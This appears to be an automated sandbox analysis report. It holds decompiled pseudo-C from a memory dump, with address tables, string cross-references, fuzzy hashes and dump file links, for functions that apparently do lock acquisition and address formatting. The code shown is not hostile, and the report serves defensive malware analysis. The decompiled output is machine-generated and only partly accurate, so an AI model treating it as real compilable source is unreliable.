0x02100b90
0x00000000
0x00000000
0x02100b96
0x00000000
0x02100b96
0x02100a04
0x02100a04
0x02100b9a
0x02100b9a
0x02100b9b
0x02100b9f
0x00000000
0x00000000
0x00000000
0x02100ba5
0x02100ac7
0x02100aca
0x0212eacf
0x00000000
0x0212eade
0x0212eade
0x0212eae3
0x00000000
0x00000000
0x0212eaf3
0x0212eaf6
0x0212eaf7
0x0212eafe
0x0212eb01
0x00000000
0x0212eb01
0x0212eacf
0x02100ad0
0x02100ad4
0x00000000
0x00000000
0x02100ada
0x02100ae6
0x02100c34
0x00000000
0x02100c47
0x02100c49
0x02100c4a
0x02100c4e
0x02100c51
0x02100c54
0x02100c57
0x02100c5a
0x00000000
0x00000000
0x00000000
0x02100c60
0x02100afb
0x02100afe
0x02100b02
0x02100b05
0x02100b08
0x00000000
0x02100b08
0x02100ae6
0x02100b44
0x021009f8
0x021009f8
0x021009f9
0x00000000
0x00000000
0x0212eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02100BF6
__fassign.LIBCMT ref: 02100CA2

Strings

:, xrefs: 02100BA9
:, xrefs: 02100AC7
., xrefs: 02100A0C

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 031e312019ed5583bbade49953bba15e1aff368b6a2cf023d9e1a83d7fe0caec
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: E2A18E71D8021EDECF24CF65C9847BEB7B5AF0D309F2484AAD852A72C1D7B09649CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02100554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E02100554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021a01c0;
									_push(_t144);
									_push(0);
									_t51 = E020BF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02104FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02113F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02113F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0214217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02113F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02103915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021a01c0;
												_push(_t138);
												_push(0);
												_t58 = E020BF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02104FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02113F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02113F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0214217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02113F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02103915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E020E5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E020BF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02103915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E020BF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02103915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E020BF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02103915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E020E5329(_t110, _t138);
																_t69 = E020E53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0210055a
0x0210055d
0x02100563
0x02100566
0x021005d8
0x021005e2
0x021005e5
0x00000000
0x021005e7
0x021005e7
0x021005ea
0x021005f3
0x021005f3
0x02100568
0x02100568
0x02100568
0x02100569
0x02100569
0x02100569
0x0210056b
0x00000000
0x00000000
0x0212217f
0x02122183
0x0212225b
0x0212225f
0x02122189
0x0212218c
0x0212218f
0x02122194
0x02122199
0x0212219d
0x021221a0
0x021221a2
0x021221ce
0x021221ce
0x021221ce
0x021221d0
0x021221d6
0x021221de
0x021221e2
0x021221e8
0x021221e9
0x021221ec
0x021221f1
0x021221f6
0x00000000
0x00000000
0x021221f8
0x021221fb
0x02122206
0x0212220b
0x0212220c
0x02122217
0x02122226
0x0212222b
0x0212222c
0x0212222f
0x02122232
0x02122235
0x02122235
0x0212223a
0x0212223f
0x02122241
0x02122243
0x02122248
0x02122248
0x0212224d
0x0212224f
0x02122262
0x02122263
0x02122268
0x02122269
0x02122269
0x02122269
0x0212226d
0x00000000
0x00000000
0x02122276
0x02122279
0x0212227e
0x02122283
0x02122287
0x0212228a
0x0212228d
0x0212228f
0x021222bc
0x021222bc
0x021222bc
0x021222be
0x021222c4
0x021222cc
0x021222d0
0x021222d6
0x021222d7
0x021222da
0x021222df
0x021222e4
0x00000000
0x00000000
0x021222e6
0x021222e9
0x021222f4
0x021222f9
0x021222fa
0x02122305
0x02122314
0x02122319
0x0212231a
0x0212231d
0x02122320
0x02122323
0x02122323
0x02122328
0x0212232d
0x0212232f
0x02122331
0x02122336
0x02122336
0x0212233b
0x0212233d
0x02122350
0x02122351
0x02122356
0x02122359
0x02122359
0x0212235b
0x0212235d
0x020e5367
0x020e536b
0x020e5372
0x00000000
0x00000000
0x00000000
0x00000000
0x02122363
0x02122363
0x02122369
0x0212236a
0x0212236c
0x02122371
0x02122373
0x00000000
0x02122379
0x02122379
0x0212237a
0x0212237f
0x0212237f
0x02122385
0x02122386
0x02122389
0x0212238e
0x02122390
0x020e5378
0x020e537c
0x02122396
0x02122396
0x02122397
0x0212239c
0x021223a2
0x021223a3
0x021223a6
0x021223ab
0x021223ad
0x00000000
0x021223b3
0x021223b3
0x021223b4
0x021223b9
0x021223ba
0x021223ba
0x021223bc
0x021223bf
0x00000000
0x00000000
0x02119153
0x02119158
0x0211915a
0x0211915e
0x02119160
0x00000000
0x02119166
0x02119166
0x02119171
0x02119176
0x02119176
0x00000000
0x02119160
0x021223c6
0x021223ce
0x021223d7
0x021223d7
0x021223ad
0x02122390
0x02122373
0x0212233f
0x0212233f
0x00000000
0x0212233f
0x02122291
0x02122291
0x02122293
0x02122295
0x0212229a
0x021222a1
0x021222a3
0x021222a7
0x021222a9
0x00000000
0x00000000
0x021222ab
0x021222ad
0x021222af
0x00000000
0x00000000
0x00000000
0x021222af
0x021222b1
0x021222b4
0x021222b4
0x021222b6
0x020e53be
0x020e53be
0x020e53be
0x020e53c0
0x00000000
0x00000000
0x020e53cb
0x020e53ce
0x020e53d0
0x020e53d4
0x020e53d6
0x00000000
0x020e53d8
0x020e53e3
0x020e53ea
0x020e53ea
0x00000000
0x020e53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x021222b6
0x00000000
0x0212228f
0x02122349
0x0212234d
0x02122251
0x02122251
0x00000000
0x02122251
0x021221a4
0x021221a4
0x021221a6
0x021221a8
0x021221ac
0x021221b6
0x021221b8
0x021221bc
0x021221be
0x00000000
0x00000000
0x021221c0
0x021221c2
0x021221c4
0x00000000
0x00000000
0x00000000
0x021221c4
0x021221c6
0x021221c6
0x021221c8
0x00000000
0x00000000
0x00000000
0x00000000
0x021221c8
0x021221a2
0x00000000
0x02122183
0x0210057b
0x0210057d
0x02100581
0x02100583
0x02122178
0x00000000
0x02100589
0x0210058f
0x0210058f
0x02100583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02122206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021222FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0212220E
RTL: Re-Waiting, xrefs: 0212223A, 02122328
RTL: Resource at %p, xrefs: 0212221D, 0212230B

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: a44740908500b7b979b965306e7cd55276ed33d42308578c36e12a366a9996c3
Instruction ID: 59565999ecb12fc5a494ed6fac9a3298f1c1a2f7b9f0467ade5463c9f614cbe6
Opcode Fuzzy Hash: a44740908500b7b979b965306e7cd55276ed33d42308578c36e12a366a9996c3
Instruction Fuzzy Hash: 525129757802216FEB15CE18CCC1FAA33AAAF88710F214269FD55DF284EB71EC558B90

Uniqueness

Uniqueness Score: -1.00%

Function 021014C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E021014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x21a2088; // 0x775be7af
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E020F7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E021013CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E020F7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E020F7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E020C2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E020CE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x021014c0
0x021014cb
0x021014d2
0x021014d6
0x021014da
0x021014de
0x021014e3
0x0210157a
0x0210157a
0x021014f1
0x021014f3
0x0212ea0f
0x00000000
0x0212ea15
0x00000000
0x0212ea15
0x021014f9
0x021014f9
0x021014fe
0x02101504
0x0212ea1a
0x0212ea1f
0x0212ea21
0x0212ea22
0x0212ea27
0x0212ea2a
0x0212ea2a
0x02101515
0x02101517
0x0210156d
0x02101572
0x02101575
0x02101575
0x0210151e
0x0212ea50
0x0212ea55
0x0212ea58
0x0212ea58
0x0210152e
0x02101531
0x02101533
0x00000000
0x02101535
0x02101541
0x02101549
0x02101549
0x02101533
0x021014f3
0x02101559

APIs

___swprintf_l.LIBCMT ref: 0212EA22

Part of subcall function 021013CB: ___swprintf_l.LIBCMT ref: 0210146B
Part of subcall function 021013CB: ___swprintf_l.LIBCMT ref: 02101490

___swprintf_l.LIBCMT ref: 0210156D

Strings

%%%u, xrefs: 02101564
]:%u, xrefs: 0212EA47

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d4d24f6bd6f821aee7426f10d726d7386449c6af5a4c18ca4e296360b12c4ba3
Instruction ID: e8f9d7533ebe05fd8d460af23d9d3eaac1d05dbbeda2bcad958de5d82176e5ee
Opcode Fuzzy Hash: d4d24f6bd6f821aee7426f10d726d7386449c6af5a4c18ca4e296360b12c4ba3
Instruction Fuzzy Hash: 2421F7B2940319ABDB20DF54CC80AEF73ACBB11304F444415FC4AE7180DBB4EA588BE1

Uniqueness

Uniqueness Score: -1.00%

Function 020E53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E020E53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021a01c0;
									_push(_t92);
									_push(0);
									_t37 = E020BF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02104FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02113F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02113F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0214217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02113F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02103915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E020E5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E020BF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02103915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E020BF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02103915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E020BF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02103915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E020E5329(_t74, _t92);
													_push(1);
													_t48 = E020E53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x020e53ab
0x020e53ae
0x020e53b1
0x020e53b4
0x020e53b7
0x021005b6
0x021005c0
0x021005c3
0x00000000
0x021005c9
0x021005c9
0x021005cc
0x021005d5
0x021005d5
0x020e53bd
0x020e53bd
0x020e53bd
0x020e53be
0x020e53be
0x020e53be
0x020e53c0
0x00000000
0x00000000
0x02122269
0x0212226d
0x02122349
0x0212234d
0x02122273
0x02122276
0x02122279
0x0212227e
0x02122283
0x02122287
0x0212228a
0x0212228d
0x0212228f
0x021222bc
0x021222bc
0x021222bc
0x021222be
0x021222c4
0x021222cc
0x021222d0
0x021222d6
0x021222d7
0x021222da
0x021222df
0x021222e4
0x00000000
0x00000000
0x021222e6
0x021222e9
0x021222f4
0x021222f9
0x021222fa
0x02122305
0x02122314
0x02122319
0x0212231a
0x0212231d
0x02122320
0x02122323
0x02122323
0x02122328
0x0212232d
0x0212232f
0x02122331
0x02122336
0x02122336
0x0212233b
0x0212233d
0x02122350
0x02122351
0x02122356
0x02122359
0x02122359
0x0212235b
0x0212235d
0x020e5367
0x020e536b
0x020e5372
0x00000000
0x00000000
0x00000000
0x00000000
0x02122363
0x02122363
0x02122369
0x0212236a
0x0212236c
0x02122371
0x02122373
0x00000000
0x02122379
0x02122379
0x0212237a
0x0212237f
0x0212237f
0x02122385
0x02122386
0x02122389
0x0212238e
0x02122390
0x020e5378
0x020e537c
0x02122396
0x02122396
0x02122397
0x0212239c
0x021223a2
0x021223a3
0x021223a6
0x021223ab
0x021223ad
0x00000000
0x021223b3
0x021223b3
0x021223b4
0x021223b9
0x021223ba
0x021223ba
0x021223bc
0x021223bf
0x00000000
0x00000000
0x02119153
0x02119158
0x0211915a
0x0211915e
0x02119160
0x00000000
0x02119166
0x02119166
0x02119171
0x02119176
0x02119176
0x00000000
0x02119160
0x021223c6
0x021223cb
0x021223ce
0x021223d7
0x021223d7
0x021223ad
0x02122390
0x02122373
0x0212233f
0x0212233f
0x00000000
0x0212233f
0x02122291
0x02122291
0x02122293
0x02122295
0x0212229a
0x021222a1
0x021222a3
0x021222a7
0x021222a9
0x00000000
0x00000000
0x021222ab
0x021222ad
0x021222af
0x00000000
0x00000000
0x00000000
0x021222af
0x021222b1
0x021222b4
0x021222b4
0x021222b6
0x00000000
0x00000000
0x00000000
0x00000000
0x021222b6
0x0212228f
0x00000000
0x0212226d
0x020e53cb
0x020e53ce
0x020e53d0
0x020e53d4
0x020e53d6
0x00000000
0x020e53d8
0x020e53e3
0x020e53ea
0x020e53ea
0x020e53d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021222F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021222FC
RTL: Re-Waiting, xrefs: 02122328
RTL: Resource at %p, xrefs: 0212230B

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
